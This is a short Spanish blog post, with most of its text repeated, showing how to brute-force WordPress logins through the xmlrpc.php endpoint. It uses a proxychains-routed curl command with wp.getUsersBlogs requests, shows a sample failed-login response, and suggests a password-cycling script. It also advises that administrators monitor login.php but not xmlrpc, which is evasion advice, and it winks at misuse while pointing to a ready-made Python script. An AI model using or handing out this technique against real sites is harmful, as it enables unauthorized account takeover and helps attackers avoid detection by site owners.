Como enviar el contenido de un fichero por post via Curl, por ejemplo, para brute force xmlrpc
Amigos de Inseguros.
Seguro que no lo vais a usar para hacer brute force de algún Wordpress con el xmlrpc instalado, pero por si acaso, seguro que os es útil usar el comando:
proxychains curl -X POST http://dominio/xmlrpc.php -H "Content-Type: text/xml" --data-binary "@ruta al fichero"
Por ejemplo, podemos probar con estos datos:
wp.getUsersBlogs admin password
Y nos devuelve esto:
faultCode
403
faultString
Usuario o contraseña incorrecta.
La gracia sería obtener esta salida:
Un script que cambie la contraseña y que pruebe, almacenando el resultado y que al encontrar un string "isAdmin" lo muestre por pantalla, sería una idea medio buena. Seguro que el administrador monitoriza el "login.php" y no el xmlrpc.
Espero que os sirva de ayuda y que seáis buenos !!!
EDITADO: Gracisa al señor @neofito tenemos un script en python ya preparado xD
Seguro que no lo vais a usar para hacer brute force de algún Wordpress con el xmlrpc instalado, pero por si acaso, seguro que os es útil usar el comando:
proxychains curl -X POST http://dominio/xmlrpc.php -H "Content-Type: text/xml" --data-binary "@ruta al fichero"
Por ejemplo, podemos probar con estos datos:
Y nos devuelve esto:
La gracia sería obtener esta salida:
Un script que cambie la contraseña y que pruebe, almacenando el resultado y que al encontrar un string "isAdmin" lo muestre por pantalla, sería una idea medio buena. Seguro que el administrador monitoriza el "login.php" y no el xmlrpc.
Espero que os sirva de ayuda y que seáis buenos !!!
EDITADO: Gracisa al señor @neofito tenemos un script en python ya preparado xD